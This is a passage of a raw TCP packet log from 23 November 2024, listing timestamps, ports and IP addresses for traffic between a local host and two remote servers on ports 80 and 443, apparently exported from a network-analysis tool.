                                                                                                                                                                                          Nov 23, 2024 17:44:30.030577898 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030601978 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030620098 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030635118 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030653954 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030651093 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030713081 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030720949 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030720949 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030730009 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030747890 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030766010 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030780077 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030806065 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.079384089 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.080049992 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.080087900 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.080704927 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.080718994 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.152729988 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.152748108 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.152807951 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.227700949 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.228251934 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.228277922 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.228882074 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.228887081 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.240833998 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.240905046 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.240998983 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.245062113 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.245172024 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.245337963 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.251727104 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.253595114 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.253716946 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.253779888 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.254587889 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.254935980 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.254962921 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.255563021 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.255574942 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.262192965 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.262295008 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.262373924 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.264522076 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.264589071 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.265202045 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.265218019 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.270756006 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.270879984 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.270940065 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.279341936 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.279400110 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.279449940 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.286516905 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.287121058 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.287144899 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.287637949 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.287643909 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.287847996 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.288013935 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.288069010 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.296468973 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.296650887 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.296895027 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.305012941 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.305160046 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.305635929 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.313606977 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.313764095 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.314199924 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.322154999 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.322314978 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.322792053 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.362987041 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.404994965 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.451291084 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.451381922 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.451453924 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472721100 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472840071 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472892046 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472929001 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472933054 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472980976 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.472990036 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.473016024 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.473050117 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.473083019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.473103046 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.473117113 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.473126888 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.477725029 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.477916002 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.477979898 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.483072996 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.483196974 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.483273029 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.488406897 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.488527060 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.488590956 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.493789911 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.493825912 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.493880987 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.499136925 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.499233007 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.499279976 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.504523039 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.504600048 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.504656076 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.509943008 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.510103941 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.510176897 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.515253067 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.515398979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.515463114 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.520735979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.520889997 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.520962000 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.526123047 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.526139975 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.526191950 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.531387091 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.531505108 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.531574965 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534010887 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534073114 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534140110 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534404039 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534439087 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534466982 CET49729443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.534486055 CET4434972913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.536823034 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.536906004 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.536978960 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.537861109 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.537921906 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.538002014 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.538465023 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.538497925 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.542171955 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.542269945 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.542325974 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.547612906 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.547682047 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.547751904 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.553056002 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.553124905 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.553198099 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.558418989 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.608063936 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.663474083 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.663537979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.663619995 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.665169954 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.665829897 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.665895939 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.665956020 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.669702053 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.669814110 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.669869900 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.672879934 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.673022985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.673079967 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.676246881 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.676405907 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.676465034 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.679528952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.679668903 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.679725885 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.682914972 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.683145046 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.683211088 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.686232090 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.686340094 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.686346054 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688213110 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688354015 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688425064 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688657999 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688673973 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688684940 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.688689947 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.689348936 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.689462900 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.689515114 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.691893101 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.691941977 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692008972 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692028046 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692148924 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692244053 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692260027 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692284107 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692384005 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692384958 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692428112 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692452908 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692568064 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692747116 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.692811966 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.694597960 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.694628954 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.694704056 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.694850922 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.694864035 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.695950985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.696062088 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.696118116 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699142933 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699215889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699270964 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699445009 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699582100 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699651003 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699811935 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699836016 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699860096 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.699872017 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702277899 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702289104 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702348948 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702450037 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702459097 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702472925 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702524900 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.702579021 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.705631971 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.705704927 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.705832958 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.708837986 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.708904982 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.709012032 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.712085962 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.712196112 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.712196112 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.715279102 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.715387106 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.715421915 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.718539000 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.718601942 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.718657970 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.721816063 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.721927881 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.721988916 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.725100994 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.725187063 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.725250959 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.727657080 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.727706909 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.727775097 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728010893 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728053093 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728089094 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728104115 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728243113 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728399992 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.728451014 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.730654001 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.730664015 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.730737925 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.731061935 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:30.731070995 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.731524944 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.731651068 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.731713057 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.734894037 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.734956980 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.735013008 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.738059044 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.738078117 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.738133907 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.741267920 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.741386890 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.741450071 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.744488955 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.744576931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.744631052 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.747788906 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.747901917 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.747956991 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.750989914 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.751055002 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.751084089 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.754262924 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.754278898 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:30.754336119 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.757499933 CET8049732185.215.113.16192.168.2.5
